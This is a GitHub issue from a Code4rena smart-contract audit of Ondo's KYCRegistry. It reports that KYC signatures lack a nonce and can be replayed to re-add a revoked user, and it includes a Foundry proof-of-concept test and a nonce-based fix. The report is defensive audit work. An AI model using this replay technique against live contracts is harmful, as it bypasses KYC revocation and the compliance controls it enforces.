Skip to content

lack of nonce in kyc signature enables replay #161

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
code423n4 opened this issue Jan 17, 2023 · 2 comments
Closed

lack of nonce in kyc signature enables replay #161

code423n4 opened this issue Jan 17, 2023 · 2 comments
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working duplicate-187 satisfactory satisfies C4 submission criteria; eligible for awards

Comments

@code423n4
Copy link
Contributor

Lines of code

https://github.com/code-423n4/2023-01-ondo/blob/main/contracts/cash/kyc/KYCRegistry.sol#L94

Vulnerability details

Description

To prove you have done KYC ondo provides a signature that you can use to add a user as having done KYC.

An admin can also go in and later remove this.

But due to a lack of nonce used the same signature, if it is still withing deadline, can be used to re-add the user as KYCed even after it has been removed.

Impact

A user can re-add themselves as KYCed even after an admin has removed them. Given that the deadline still holds

Proof of Concept

PoC test in RegistrySignature.sol:

  function test_signature_replay_after_removed() public {
    // first add via signature
    vm.prank(user1);
    registry.addKYCAddressViaSignature(1, user1, deadline, v, r, s);
    assertEq(registry.getKYCStatus(1, user1), true);

    address[] memory addresses = new address[](1);
    addresses[0] = user1;

    // signer removes kyc for user1
    vm.prank(signer);
    registry.removeKYCAddresses(1, addresses);
    assertEq(registry.getKYCStatus(1, user1), false);

    // user1 can still use the same signature to re-add themselves
    vm.prank(user1);
    registry.addKYCAddressViaSignature(1, user1, deadline, v, r, s);
    assertEq(registry.getKYCStatus(1, user1), true);
  }

Tools Used

vs vode, force

Recommended Mitigation Steps

use a per user nonce when providing a signature
@code423n4 code423n4 added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working labels Jan 17, 2023
code423n4 added a commit that referenced this issue Jan 17, 2023
@code423n4
immeas issue #161
e1a9fee
@c4-judge
Copy link
Contributor

trust1995 marked the issue as duplicate of #187

@c4-judge
Copy link
Contributor

trust1995 marked the issue as satisfactory

@c4-judge c4-judge added the satisfactory satisfies C4 submission criteria; eligible for awards label Jan 23, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working duplicate-187 satisfactory satisfies C4 submission criteria; eligible for awards
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@code423n4 @c4-judge